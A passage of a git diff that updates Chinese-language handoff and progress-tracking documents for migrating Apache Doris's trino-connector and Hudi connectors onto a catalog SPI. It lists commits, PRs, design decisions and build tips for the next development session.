4.(沿用)SPI 分区裁剪链路 + Hive parity 基准(T05) +- `PluginDrivenScanNode.applyFilter`→`currentHandle`→`getSplits`→`HudiScanPlanProvider.resolvePartitions` 读 `getPrunedPartitionPaths()`。Hudi `applyFilter` 镜像 `HiveConnectorMetadata.applyFilter`(7 步 + 7 helper duplicate,hudi 仅依赖 fe-connector-hms)。 ---- +### 5.(沿用)BE Hudi JNI column_types/names/delta 契约(T02) +- `THudiFileDesc.{delta_logs,column_names,column_types}` thrift `list`;**BE 自做 join**:names `,` / types **`#`** / delta `,`(`hudi_jni_reader.cpp:52-54`)。FE 传 typed list、类型串用 Hive 串(`HudiTypeMapping.toHiveTypeString`,非 `getTypeName()`)。 -## 🎯 下一个 session 第一件事 - -``` -1. 自检: - git branch --show-current → catalog-spi-03 - git log --oneline -8 → 顶层应是 9bba12a44b2 (T11) → ed81a063fe8 (T08-T10) - → 0fe4b8a93d6 (T07) → 5e504a24883 (doc) → 9ed33f9a7a5 (批 B) - → 69203b6418e (批 A) → 8f0b749bd06 (recon) → 3adabcaf54b (P1) - git status → 干净(本次文档 commit 之后) - -2. 解决 PR base(核心待办): - - git fetch upstream-apache branch-catalog-spi - - 确认 branch-catalog-spi 是否仍停在 778c5dd610f(P1)。 - - 推荐做法:从远端 branch-catalog-spi 拉新分支(如 catalog-spi-03-pr), - cherry-pick 这 7 个 P2 commit(8f0b749bd06 recon → 69203b6418e A → 9ed33f9a7a5 B - → 5e504a24883 doc → 0fe4b8a93d6 C → ed81a063fe8 D → 9bba12a44b2 E)。 - 注意:branch-catalog-spi 没有 fe-sql-parser 拆分(#63823),但我们的改动与之正交, - cherry-pick 后应能编译;在该分支上重跑 fe-core compile + fe-connector-trino test 验证。 - - 或:等 branch-catalog-spi 被刷新到 master 后直接用 catalog-spi-03。 - - PR:gh pr create --repo apache/doris --base branch-catalog-spi --head morningman:<分支> - --title "[feat](connector) P2 trino-connector migration" - -3. T12 回归测试:在有 Trino plugin + docker/集群环境补(DV-003)。 - -4. 之后启动 P3 Hudi 迁移(见 00-master-plan / connectors/hudi.md)。 - 注意 P1-T4 incrementalRelation 是 P3 Hudi SPI 缺口。 -``` +### 6.(沿用)批 E 去向 + 沿用坑 +- rebase 后 fe-core `target/generated-sources/.../DorisParser.java` 残留 → cannot find symbol:**clean fe-core**(非 fe-sql-parser),别当代码 bug 查。 +- `PhysicalPlanTranslator` 里 hudi **之外**的连接器 `instanceof` 分支待各自 P 阶段迁完再删,**本场只动 hudi**。 +- 用户向文档在 doris-website 仓(DV-004)。 +- connectors/hudi.md 的 §关联「偏差:(暂无)」是 pre-existing 陈旧(实际 DV-005..008 相关),本场未顺手改(surgical);下次清 kanban 时一并修。 --- -## 📋 P2 commit 节奏(branch `catalog-spi-03`,rebase 到新 master 后) +## 🎯 下一个 session 第一件事 ``` -9bba12a44b2 [test](connector) [P2-T11] add fe-connector-trino unit tests ← 批 E -ed81a063fe8 [refactor](connector) [P2-T08-T10] remove legacy trino-connector code ← 批 D -0fe4b8a93d6 [feat](connector) [P2-T07] enable trino-connector in SPI_READY_TYPES ← 批 C -5e504a24883 [doc](connector) refresh P2 HANDOFF for batch C kickoff -9ed33f9a7a5 [feat](connector) [P2-T03-T06] bridge trino-connector through fe-core ← 批 B -69203b6418e [feat](connector) [P2-T01-T02] complete trino-connector SPI surface ← 批 A -8f0b749bd06 [doc](connector) P2 trino-connector recon + task breakdown ← 批 0 -3adabcaf54b [P1-T03-T05] route plugin-driven scans first (#63641) ← P1(rebase 后新 hash) +1. 自检: + git branch --show-current → catalog-spi-04 + git log --oneline -6 → <本 doc>(T08/D-020) 76586b2(批 C handoff) 435065f(T07 feat) 04f6576 10b72d4 301fe38 + git status → clean(除 .audit-scratch/ conf.cmy/ regression-conf.bak;research/ 现已跟踪) + Read PROGRESS.md §一/§三 + 本文件关键认知 1(M1⊥M2 + D-020) + +2. PR #64143 已开(base apache/doris:branch-catalog-spi、head morningman:catalog-spi-04): + gh pr view 64143 --repo apache/doris → 盯 CI / review + review 改动在 catalog-spi-04 续 commit + push 即自动进 PR(前序均 squash-merge) + 合入后:批 E 并入 P7(T08/D-020 已出 M1+M2 设计)或启 P4 + → P3 内不碰 SPI_READY_TYPES / fe-core 消费实现 / legacy / 非 hudi 连接器(皆批 E) + +3. 若走 (2) 批 E:实现序见本文件「批 E backlog」M1→M2→M4→翻闸; + 设计直接读 designs/P3-T08-tableformat-dispatch-design.md(M1+M2 + Implementation Plan + Open)。 ``` -本次文档 commit(T13)将追加一条 `[doc](connector) [P2-T13] sync P2 tracking docs`。 - -> ⚠️ 这 7 个 P2 commit 是干净的;问题只在 base(见 §未完成 1)。PR 不要在 base 对齐前开。 - --- -## 📂 本场修改 / 新增的关键文件 +## 📂 P3 关键文件锚点 ``` -批 C (0fe4b8a93d6): fe-core/.../datasource/CatalogFactory.java (SPI_READY_TYPES) -批 D (ed81a063fe8): fe-core/.../nereids/glue/translator/PhysicalPlanTranslator.java (删 trino 分支+import) - fe-core/.../datasource/CatalogFactory.java (删 case+import) - fe-core/.../datasource/ExternalCatalog.java (TRINO_CONNECTOR db→PluginDrivenExternalDatabase, DV-001) - 删 fe-core/.../datasource/trinoconnector/ (10 文件) - 删 fe-core/src/test/.../trinoconnector/TrinoConnectorPredicateTest.java -批 E (9bba12a44b2): 新建 fe-connector/fe-connector-trino/src/test/.../trino/ - TrinoPredicateConverterTest.java / TrinoTypeMappingTest.java / TrinoConnectorProviderTest.java -T13: plan-doc/{PROGRESS, tasks/P2, connectors/trino-connector, deviations-log, HANDOFF}.md +T02(已修): HudiTypeMapping.toHiveTypeString / HudiScanRange(typed list)/ BE hudi_jni_reader.cpp:52-54 +T03(批 E): ExternalUtil.initSchemaInfo / BE table_schema_change_helper.h:219-267 / HudiColumnHandle(无 field id) +T04(已修): PhysicalPlanTranslator.visitPhysicalHudiScan SPI 分支(两守卫) +T05(已修): HudiConnectorMetadata.applyFilter(7 步 + 7 helper)/ HudiPartitionPruningTest(FakeHmsClient 先例) +T06(决策): ConnectorMetadata MVCC 三 default / 无 override(opt-out) +T07(已修): HudiConnectorMetadata.avroSchemaToColumns(顶层降字 + package-private static) + 测试: hudi HudiTypeMappingTest/HudiSchemaParityTest/HudiTableTypeTest;hms HmsTypeMappingTest;hive HiveFileFormatTest/HiveConnectorMetadataPartitionPruningTest + 设计: designs/P3-T07-test-baseline-design.md +T08(本场,设计): 设计 designs/P3-T08-tableformat-dispatch-design.md;决策 D-020 + keystone: PluginDrivenExternalTable.initSchema:79-109(只读 columns)/ getEngine:195-215 / getEngineTableTypeName:217-231(switch catalog type) + M2 seam: ConnectorMetadata:37-44(加 default getScanPlanProvider(handle))/ Connector.getScanPlanProvider:40-42(per-catalog 回落) + ConnectorScanPlanProvider.planScan:62-66(入参带 handle)/ PluginDrivenScanNode.getSplits(~356-378,fe-core 改动点,批 E) + 载体: ConnectorTableSchema.getTableFormatType:58-60 + 素材: plan-doc/research/spi-multi-format-hms-catalog-analysis.md(本场已跟踪) +gate: CatalogFactory.java:52(SPI_READY_TYPES,不含 hms/hudi——别动) +设计备忘: plan-doc/tasks/designs/P3-T02-*.md / T04 / T05 / T06 / T07 / T08 +scratch: .audit-scratch/p3-t0X-*.workflow.js(本地 workflow 脚本,未跟踪) ``` --- ## 🧠 给下一个 agent 的 meta 建议 -- **分支 `catalog-spi-03`** 现基于 master;**开 PR 前务必先解决 base 错位**(§未完成 1),否则会是 191-commit 错误 PR。 -- rebase 后 fe-core 编译失败先想到 **clean fe-core**(stale DorisParser),别查代码(§关键认知 1)。 -- commit message 沿用 `[feat|refactor|test|doc](connector) [P2-Tnn] ...`。 -- Maven:cwd=`fe/` 或 `-f fe/pom.xml`;`-pl fe-core -am`;`-Dmaven.build.cache.enabled=false`;测试 `-DfailIfNoTests=false`。 -- **不要乱碰 P1 fallback 中 trino 之外的连接器分支**。 -- 偏差先记 `deviations-log.md` 再改文档(本场 DV-001..004 已记)。 +- **P3 hybrid 收尾**:批 A–D 已全部 in-scope 完成。下一步是**分叉决策**(PR / 批 E→P7 / P4),**先问用户**,别默认开 PR 或自动进 P4。 +- **批 E 实现按 T08 设计走**(M1⊥M2,M2=方案 B),**别按 D-005 旧"PhysicalXxxScan"措辞**(已被 D-020 supersede)。新 default 方法保持 D-009(不破签名)。 +- 偏差先记 `deviations-log.md` 再改文档;架构/可行性 fork 先问用户(本场 M2 方案 B 已签字 → D-020)。 +- Maven:cwd=`fe/`;`-pl -am`;`-Dmaven.build.cache.enabled=false`;测试 `-DfailIfNoTests=false`;**checkstyle 单独跑**(含 test 源);**禁 static import**。 +``` diff --git a/plan-doc/PROGRESS.md b/plan-doc/PROGRESS.md index fc22aeb7a80ea3..b6d5a08db8f9d8 100644 --- a/plan-doc/PROGRESS.md +++ b/plan-doc/PROGRESS.md @@ -1,6 +1,6 @@ # 📊 项目进度仪表盘 -> 最后更新:**2026-06-04** | 当前阶段:**P2 trino-connector 代码完成**(T07–T11,T13 ✅;T12 推迟);PR 待开(分支基线对齐中) | 项目总进度:**30%** +> 最后更新:**2026-06-05** | 当前阶段:**P3 Hudi hybrid(D-019)批 A–D 全部 in-scope 完成**(T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E);剩批 E(cutover)并入 P7,P3 PR #64143 已开(CI 中) | 项目总进度:**33%** > [README](./README.md) · [Master Plan](./00-connector-migration-master-plan.md) · [SPI RFC](./01-spi-extensions-rfc.md) · [Decisions](./decisions-log.md) · [Deviations](./deviations-log.md) · [Risks](./risks.md) · [Agent Playbook](./AGENT-PLAYBOOK.md) · [Handoff](./HANDOFF.md) --- @@ -11,8 +11,8 @@ |---|---|---|---|---|---| | **P0** | SPI 缺口补齐 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR #63582 squash-merge `c6f056fa5bd`,T24-T25 流水线全绿)| [tasks/P0](./tasks/P0-spi-foundation.md) | | **P1** | scan-node 收口 + 重复清理 | 1 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 完成(PR [#63641](https://github.com/apache/doris/pull/63641) squash-merged `778c5dd610f`;T1 推迟 P8;T2 推迟 P4/P5)| [tasks/P1](./tasks/P1-scan-node-cleanup.md) | -| **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 代码完成(T01-T11,T13;T12 推迟;PR 待开) | [tasks/P2](./tasks/P2-trino-connector-migration.md) | -| P3 | hudi 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | +| **P2** | trino-connector 迁移 | 2 周 | ▰▰▰▰▰▰▰▰▰▰ 100% | ✅ 已合入 `branch-catalog-spi`(#64096,squash `0793f032662`;T12 回归推迟 DV-003)| [tasks/P2](./tasks/P2-trino-connector-migration.md) | +| P3 | hudi 迁移 | 2 周 | ▰▰▰▰▰▱▱▱▱▱ 45% | 🚧 hybrid(D-019);**批 A–D 全部 in-scope 完成**(T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E);剩批 E(cutover)并入 P7,P3 PR #64143 已开(CI 中) | [tasks/P3](./tasks/P3-hudi-migration.md) | | P4 | maxcompute 迁移 | 2 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P5 | paimon 迁移 | 3 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | | P6 | iceberg 迁移 | 5 周 | ▱▱▱▱▱▱▱▱▱▱ 0% | ⏸ 待启动 | — | @@ -32,7 +32,7 @@ | **jdbc** | ✅ | ✅ 100% | ✅ | 🟡 (13 个旧 client,P1 删) | n/a | **95%** | [详情](./connectors/jdbc.md) | | **es** | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/es.md) | | trino-connector | ✅ | ✅ 100% | ✅ | ✅ | ✅ | **100%** | [详情](./connectors/trino-connector.md) | -| hudi | 🟡 | 🟨 50% | ❌ | ❌ | 0/0(寄生 hive) | **20%** | [详情](./connectors/hudi.md) | +| hudi | 🟡(D-005 区分符 + D-020 模型 dispatch 已设计;实现批 E)| 🟨 55%(读路径 dormant + 批 C 测试基线)| ❌(gate 关)| ❌ | 0/0(寄生 hms)| **25%** | [详情](./connectors/hudi.md) | | maxcompute | 🟡 | 🟨 60% | ❌ | ❌ | 0/12 | **25%** | [详情](./connectors/maxcompute.md) | | paimon | 🟡 | 🟨 50% | ❌ | ❌ | 0/10 | **20%** | [详情](./connectors/paimon.md) | | iceberg | 🟡 | 🟥 10% | ❌ | ❌ | 0/19 | **5%** | [详情](./connectors/iceberg.md) | @@ -44,7 +44,22 @@ > 状态非 ✅ 的项,按阶段聚合。详细见各阶段 task 文件。 -### P2 — trino-connector 迁移(🚧 进行中) +### P3 — hudi 迁移(🚧 hybrid,批 A–D 全部 in-scope 完成:T02/T04/T05/T07 ✅ + T06/T08 决策;T03→批 E;剩批 E→P7,P3 PR #64143 已开(CI 中)) + +> 策略 = **hybrid**([D-019](./decisions-log.md)):现做 (b) 连接器硬化+测试(behind gate),推迟 (a) 模型落地+cutover 到 hive/HMS migration。详细批次见 [tasks/P3](./tasks/P3-hudi-migration.md);背景见 [DV-005](./deviations-log.md) / [HANDOFF](./HANDOFF.md) 关键认知 1+1b。 + +| 项 | 状态 | 备注 | +|---|---|---| +| HMS-over-SPI recon(#1 元数据 + #2 scan/split)| ✅ | code-grounded + 对抗验证;verdict `hmsMetadataOverSpiReady=false`(DV-005)| +| catalog 模型决策(a/b/c)| ✅ hybrid(D-019)| 现做 (b),推迟 (a);真阻塞=独立 `"hudi"` type vs 寄生 `"hms"` 的 `DLAType.HUDI`、fe-core 不消费 `tableFormatType` | +| SPI scan/split 路径 recon | ✅ | **混合 COW-native/MOR-JNI 不是问题**(per-range format,与 legacy 结构等价,BE 每 range 建 reader;2 路对抗验证);plumbing 正确但 verdict 仍 false(gate/模型未解)| +| scan 侧 parity 修复(HIGH)| ✅ 批 A 范围 | **②✅ column_types(T02 `95f23e9`)**;**③④✅ time-travel/增量 fail-loud(T04 `feceabb`)**——`visitPhysicalHudiScan` SPI 分支抛 `AnalysisException`(不再静默)。**①schema_id/history 推迟批 E([DV-006])**(连接器缺 field-id/InternalSchema/type→thrift;裸基线净回归);详见 [HANDOFF](./HANDOFF.md) 1b | +| MVCC/snapshot SPI(T06)| ✅ 批 B 决策 | keep default opt-out(DV-007)——全体连接器无 override,T04 已 fail-loud time-travel;完整 MVCC + 增量读(P1-T04 gap,4 个 `*IncrementalRelation` 仍在 fe-core)入批 E | +| listPartitions 真实裁剪(T05)| ✅ 批 B | applyFilter EQ/IN 裁剪(`10b72d4`,镜像 Hive)+ 修复"分区来源静默切换";`listPartitions*` override→批 E(DV-007)| +| 三连接器模块测试(T07)| ✅ 批 C | fe-connector-hms/hive/hudi 测试基线落地(hms 12 + hive 14 + hudi +18=33 全绿,golden-value)+ COW/MOR schema parity(schema type-agnostic);列名 casing 当场修(DV-008,镜像 legacy);gap-2 meta-field 推迟批 E | +| tableFormatType 分流消费设计(T08)| ✅ 批 D | design-only 设计备忘 + [D-020](用户签字):**M1 身份消费 ⊥ M2 scan 路由**拆解(M1 三方案通用);M2=**方案 B**(新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`,fe-core 优先 per-table、回落 per-catalog),细化 D-005;A 备选/C 否决;实现登记批 E/P7。设计 `designs/P3-T08-tableformat-dispatch-design.md` | + +### P2 — trino-connector 迁移(✅ 已合入 #64096) | ID | Task | 批次 | Owner | 状态 | 启动 | 备注 | |---|---|---|---|---|---|---| | P2-T01 | `TrinoConnectorProvider.validateProperties` + `TrinoDorisConnector.preCreateValidation` | 批 A | @me | ✅ | 2026-05-25 | required-property check + preCreateValidation 触发 plugin loading;+20 LOC | @@ -59,7 +74,7 @@ | P2-T10 | 删 `datasource/trinoconnector/` 整目录 + legacy test | 批 D | @me | ✅ | 2026-06-04 | commit `ed81a063fe8`;GsonUtils 不碰(批 B 已处理);+ExternalCatalog db case(DV-001)| | P2-T11 | fe-connector-trino 单元测试 | 批 E | @me | ✅ | 2026-06-04 | commit `9bba12a44b2`;3 类/29 测试;无 mock,json/schema 砍(DV-002)| | P2-T12 | regression-test `trino_connector_migration_compat`(image 兼容) | 批 E | @me | 🟡 | — | **推迟**(无集群/plugin;DV-003)| -| P2-T13 | 同步跟踪文档 + 开 PR | 批 E | @me | ✅ | 2026-06-04 | 文档已同步;docs-next 不在本仓(DV-004);**PR 待开**(分支对齐)| +| P2-T13 | 同步跟踪文档 + 开 PR | 批 E | @me | ✅ | 2026-06-04 | 文档已同步;docs-next 不在本仓(DV-004);**已合入 #64096**(squash `0793f032662`)| 详细任务说明、阶段日志见 [tasks/P2-trino-connector-migration.md](./tasks/P2-trino-connector-migration.md) @@ -113,6 +128,15 @@ > 倒序,新内容置顶;超过 14 天的条目移除(git log 保留历史)。 +- **2026-06-05** ✅ **P3 批 D 完成(T08 `tableFormatType` 分流消费设计备忘,design-only)= P3 hybrid in-scope(批 A–D)全完成**:以上 session 的 6-reader recon(`research/spi-multi-format-hms-catalog-analysis.md`)为直接输入,本场不重复 recon、只 firsthand 核读 load-bearing 锚点(确认 keystone gap:`PluginDrivenExternalTable.initSchema` 只读 columns 丢 `tableFormatType`;新增第二缺口:`getEngine`/`getEngineTableTypeName` switch catalog type 非 per-table format;`planScan` 入参带 per-table handle)。**核心分析贡献**:把 keystone 拆成可分离的 **M1 身份消费 ⊥ M2 scan 路由**(M1 三方案通用,A/B/C 只在 M2 分歧)。M2 三方案评估后 **AskUserQuestion 用户签字 = 方案 B**([D-020]):新增向后兼容 default `ConnectorMetadata.getScanPlanProvider(handle)`(默认 null→回落 per-catalog),fe-core `PluginDrivenScanNode.getSplits` 优先 per-table、回落 per-catalog;把 per-table 选 provider 升为一等 SPI 契约(满足 D-009 default-only)。A(连接器内 router,零 SPI churn)备选;C(fe-core 发现期分派)否决(违瘦 fe-core)。**细化 D-005**(区分符沿用;"PhysicalXxxScan" 措辞早于 P1 scan-node 统一,由 per-table provider seam 取代)。缩界:本场零代码、gate 不动;Iceberg-on-hms 经 SPI 依赖 P6/M3;M1+M2 实现登记批 E/P7。**P3 hybrid 净产出**=2 正确性修(T02/T05)+ 2 fail-loud/决策(T04/T06)+ 测试网零→59 测(T07)+ 模型 dispatch 设计(T08/D-020)。**P3 PR [#64143](https://github.com/apache/doris/pull/64143) 已开**(base branch-catalog-spi,26 files +3065/−154,12 commits);下一步=监控 CI / 处理 review,批 E 并入 P7 / 启 P4。设计 `designs/P3-T08-tableformat-dispatch-design.md` +- **2026-06-05** ✅ **P3 批 C 编码完成(T07 三模块测试基线 + COW/MOR schema parity)**:feasibility recon(5-agent code-grounded workflow)定 **golden-value parity**(fe-core 只依赖 fe-connector-api/-spi、不依赖具体连接器模块,无跨模块编译路径;JUnit5 + 手写替身);关键结论 **COW/MOR schema type-agnostic**(legacy/SPI 两侧 schema 推导都不按表型分支,差异只在 scan planning)。落地:**hudi**——`avroSchemaToColumns` 顶层列名 `toLowerCase` 修(gap-1,镜像 legacy `HMSExternalTable:745`,仅顶层、嵌套 struct 名保留)+ package-private static 可测;`HudiTypeMappingTest` 补 `fromAvroSchema`→ConnectorType golden(原零覆盖);新 `HudiSchemaParityTest`(列名/序/类型/Hive 串/casing 边界 pin)+ `HudiTableTypeTest`(COW/MOR/UNKNOWN 分类)。**hms**——新 `HmsTypeMappingTest`(hms+hive 共享的 Hive 类型串解析器,原零测试)。**hive**——新 `HiveFileFormatTest` + `HiveConnectorMetadataPartitionPruningTest`(镜像 T05 裁剪网)。三模块 test:hms 12 + hive 14 + hudi +18=33 全绿;checkstyle 0(含 test 源);import-gate 通过。**两 parity gap**([DV-008]):gap-1 列名 casing 当场修(用户签字),gap-2 Hudi meta-field 纳入(`getTableAvroSchema(true)` vs 无参)推迟批 E(无真实 metaclient 不可单测)。下一步批 D(T08 design-only)。设计:`designs/P3-T07-test-baseline-design.md` +- **2026-06-05** ✅ **P3 批 B 编码完成**(T05 ✅ + T06 决策,[DV-007]):**T05**(commit `10b72d4`,feat)`HudiConnectorMetadata.applyFilter` 真实 EQ/IN 分区裁剪——原占位实现列**全部** HMS 分区不裁剪、且无条件设 `prunedPartitionPaths` 静默把分区来源从 Hudi-metadata 切到 HMS;重写为忠实镜像 `HiveConnectorMetadata`(抽取 partition 列 EQ/IN 谓词→列候选→裁剪→仅有效果时回传 pruned handle,否则 `Optional.empty()` 回落 Hudi-metadata listing),保留 `List` 路径表示 + `-1` 上限,7 helper duplicate from Hive(hudi 仅依赖 fe-connector-hms)。`HudiPartitionPruningTest` 8 测全绿(模块 19 测)、checkstyle 0、import-gate 通过。**T06**(零代码决策,用户签字)MVCC/snapshot SPI **保持 default `Optional.empty()` opt-out**——recon 证「显式抛异常 override」错(破 SPI opt-out 约定、全体连接器无 override、无 production caller=死代码、T04 已 fail-loud time-travel);完整 MVCC 入批 E。**scope 校正**([DV-007]):T05 `listPartitions*` override 推迟批 E(零 live caller、Hive 不 override)。批 A+B 编码完成,下一步批 C(三模块测试 + COW/MOR parity)。设计:`designs/P3-T05-*` / `P3-T06-*` +- **2026-06-05** ✅ **P3-T04 time-travel/增量读 fail-loud**(commit `feceabb`,批 A 编码收尾):`PhysicalPlanTranslator.visitPhysicalHudiScan` SPI 分支对 `FOR TIME/VERSION AS OF`(曾静默返最新——provider 永远读 `lastInstant`)与增量读(曾静默全扫——SPI 无表示)抛 `AnalysisException`。唯一同时可见 snapshot+incremental 处。fe-core 编译 + checkstyle 0;dormant 分支 gate 关时不可达=零 live 风险;单测推迟批 E(不可 exercise,R12 显式登记)。**批 A 编码完成**:T02 + T04 两个正确性修复落地,T03 推迟批 E(DV-006) +- **2026-06-05** 🟡 **P3-T03 推迟批 E**([DV-006],用户签字):code-grounded recon(4-reader workflow + 主线核读 BE `table_schema_change_helper.h`)揭示 schema_id/history_schema_info **不是** 批 A 可做的 model-agnostic SPI-surface 修复——连接器缺 field-id(`HudiColumnHandle` 无)/ Hudi `InternalSchema` 版本 / type→`TColumnType` thrift;「Paimon/ES 已 override hook(设 schema)」前提失真(其 override 为 predicate/docvalue);裸 `current==file==-1`→BE `ConstNode`(identity,大小写敏感) **弱于**当前 `by_parquet_name` 名匹配 = 净回归。faithful field-id evolution parity 与 hive/HMS migration 一并入批 E。批 A 保持现状名匹配(零回归),直进 T04 +- **2026-06-04** ✅ **P3-T02(批 A 启动)column_types 双 bug 修复**(commit `95f23e9`):硬化 dormant SPI hudi 连接器(gate 关,零 live caller)。(a) `HudiScanPlanProvider` 改发完整 **Hive 类型串**(新 `HudiTypeMapping.toHiveTypeString` 复刻 legacy `HudiUtils.convertAvroToHiveType`),不再用 `getTypeName()` 发 Doris 裸类型名(丢精度/scale/子类型);(b) `HudiScanRange` 改 typed `List` 直接设 thrift `list`,弃逗号 join/split(曾打碎 `decimal(10,2)`/`struct<...>`),BE 自做 join(types `#` / names,delta `,`),与 Java `HadoopHudiJniScanner` split 契约一致(两点对抗确认)。建模块**首批**测试 11 个全绿;checkstyle 0 + import-gate 通过;3 路对抗 review 零确认缺陷。设计见 `tasks/designs/P3-T02-column-types-design.md` +- **2026-06-04** ✅ **P3 scan/split recon + 定 hybrid(D-019)+ 建 tasks/P3**:第二轮 recon(scan/split 路径,verified)——单 `PluginDrivenScanNode` 混合 COW-native/MOR-JNI **不是问题**(per-range format,与 legacy 结构等价,BE 每 range 建 reader);plumbing 正确,剩 model-agnostic 正确性 gap(schema_id/history 缺、column_types 双 bug、time-travel 静默返最新、增量无表示、partition 裁剪缺、三模块零测试)。用户定 **hybrid**([D-019](./decisions-log.md)):现做 (b) 连接器硬化+测试(behind gate,零 live 风险),推迟 (a) 模型落地+cutover 到 hive/HMS migration。已建 [tasks/P3](./tasks/P3-hudi-migration.md),批 A 待启动 +- **2026-06-04** ✅ **P2 已合入 `branch-catalog-spi`**(#64096,squash `0793f032662`,叠在 P1 `2b1a3bb2197` / P0 `72d6d0109b9` 上)。旧「PR base 错位(191-commit)」阻塞消失——`branch-catalog-spi` 已重建到新 master(P0/P1 hash 随之更新)。P2 除 T12(回归,DV-003)外全部完成 +- **2026-06-04** 🚧 **P3 Hudi 启动 recon**(8-agent code-grounded workflow + 2 路对抗验证,verdict `hmsMetadataOverSpiReady=false` / high):原计划「P3 需等 P5/P7 交付 HMS-over-SPI」与代码**不符**——HMS-over-SPI 读码(`fe-connector-hms` 客户端库 + `HiveConnectorMetadata`(type "hms") + `HudiConnectorMetadata`(type "hudi") + `ConnectorTableSchema.tableFormatType` 区分符)**早已存在但 dormant**(`SPI_READY_TYPES={jdbc,es,trino-connector}` 不含 hms/hudi,零 live caller,走 legacy `HMSExternalCatalog`)。**真正阻塞=catalog 模型错配**(独立 `"hudi"` catalog type vs Doris 真实的「寄生 `"hms"` 内以 `DLAType.HUDI` 暴露」;fe-core 不消费 `tableFormatType`)+ 增量读无 SPI 表示(P1-T04 gap)+ 三模块零测试。已验证非阻塞:SPI scan/split 通用链路被合入的 trino-connector 走通。记 **DV-005**;下一步=recon scan 路径 + 写 catalog 模型决策备忘(a/b;c 否决)+ 用户签字后编码 - **2026-06-04** ✅ **P2 批 C+D+E 完成**(T07–T11,T13;T12 推迟;PR 待开):批 C T07 翻闸(`0fe4b8a93d6`);批 D 删 fe-core legacy trino 代码 14 文件 / −2508(`ed81a063fe8`,含 recon 补回的 `ExternalCatalog` db-case DV-001,保留 MetastoreProperties / 两个 image-compat 枚举 / GsonUtils redirect);批 E T11 加 3 个纯转换器 JUnit5 测试 29 个全绿(`9bba12a44b2`,无 mock,DV-002)。T12 推迟(无集群/plugin,DV-003);T13 文档同步本条。**rebase 构建坑**:fe-core 因 stale 生成的 `DorisParser`(grammar 随 #63823 拆到 `fe-sql-parser`)编译失败,clean fe-core 即解。**PR 待开**——`catalog-spi-03` 现基于 master、与 `branch-catalog-spi`(仍 P1,分叉于 #63552)错位(191-commit),分支对齐由用户处理 - **2026-05-25(晚 ④)** ✅ **P2 批 B 完成**(T03+T04+T05+T06 fe-core 桥接):recon 揭示 HANDOFF 三处描述误差并校正——(1) T03 不能"只加 redirect 不删旧",必须 atomic replace 否则 `RuntimeTypeAdapterFactory.labelToSubtype` 撞名抛 IAE → FE 起不来;(2) T05 是 duplicate of T03,没有独立的 `ExternalCatalog.registerCompatibleSubtype` API;(3) T04 `name().toLowerCase()` 不通用——`Type.TRINO_CONNECTOR.name().toLowerCase()` 出 "trino_connector" 但 CatalogFactory 期望 "trino-connector",新增 `legacyLogTypeToCatalogType` helper 做显式 case 映射;(4) T06 `TRINO_CONNECTOR_EXTERNAL_TABLE.toEngineName()` 返 null(switch 没 case,legacy 也是 null),保留此行为不修。3 files / +29 LOC 全在 fe-core。守门:fe-core compile + checkstyle + import gate 全绿。**重要**:批 B 后到批 C T07 翻闸前,新建 trino 目录无法序列化(registerSubtype 已删但 CatalogFactory 仍走 legacy);不要在中间状态部署 - **2026-05-25(晚 ③)** ✅ **P2 批 A 完成**(T01+T02 fe-connector-trino SPI 补齐):`TrinoConnectorProvider.validateProperties` 校验 `trino.connector.name` 必填;`TrinoDorisConnector.preCreateValidation` 在 CREATE CATALOG 时触发 `ensureInitialized()` 完成 plugin 加载 + connector factory 解析,把延迟到首次查询的失败前移到 catalog 创建期。`TrinoConnectorDorisMetadata.applyFilter / applyProjection` 桥接 Trino 原生 push-down:复用现有 `TrinoPredicateConverter` 把 `ConnectorExpression` 转 `TupleDomain`,调 Trino `metadata.applyFilter / applyProjection`,把回来的 trino-side `ConnectorTableHandle` 包成新的 `TrinoTableHandle`(保留 column maps);`remainingFilter` 保守返回原表达式,匹配 legacy fe-core 行为(BE 端继续 re-evaluate)。+143 LOC 跨 3 文件,全部 `fe-connector-trino` 侧(**未触碰 fe-core**,严格守批 A 边界);import gate + compile + checkstyle 全绿。单元测试推迟到 P2-T11 批 E 一起做 @@ -155,8 +179,8 @@ | 类型 | 总数 | 最新条目 | 文档 | |---|---|---|---| -| **决策**(D-NNN) | 18 | D-018(U6: ConnectorColumnStatistics 类型契约) | [decisions-log.md](./decisions-log.md) | -| **偏差**(DV-NNN) | 0 | — | [deviations-log.md](./deviations-log.md) | +| **决策**(D-NNN) | 20 | D-020(单 `hms` 多格式 scan 路由=方案 B per-table provider;细化 D-005)| [decisions-log.md](./decisions-log.md) | +| **偏差**(DV-NNN) | 8 | DV-008(P3-T07 parity gap:列名 casing 当场修、Hudi meta-field 纳入推迟批 E)| [deviations-log.md](./deviations-log.md) | | **风险**(R-NNN) | 14 | R-014(thrift sink 选择灵活性) | [risks.md](./risks.md) | --- @@ -165,9 +189,9 @@ > 当本项目通过 Claude Code 这类 LLM agent 推进时,跟踪当前 session 状态、handoff 状况和 context 健康度。 -- **本 session 已完成**:P2 批 C(T07 翻闸 `0fe4b8a93d6`)+ 批 D(T08-T10 删 legacy `ed81a063fe8`)+ 批 E(T11 单测 `9bba12a44b2`)+ T13 文档同步。T12 推迟。本地 fe-core + fe-connector-trino 全绿(compile / test-compile / checkstyle / import-gate)。DV-001..004 已记 -- **下一个 session 应做**:(1) 解决 PR base 错位——`catalog-spi-03` 现基于 master,需从远端 `branch-catalog-spi` 拉新分支 cherry-pick 7 个 P2 commit 后开 PR;(2) T12 回归测试在有集群/plugin 的环境补;(3) 之后启动 P3 Hudi 迁移 -- **是否需要 handoff**:**是**——用户准备开新 session 跑批 C;本场已 rewrite [HANDOFF.md](./HANDOFF.md)(含 batch B→C regression window 警告 + T07/T08/T09/T10 详细 step-by-step) +- **本 session 已完成**:P3 批 D(T08 design-only,AskUserQuestion 用户签字 M2=方案 B)——`tableFormatType` 分流消费设计备忘 + 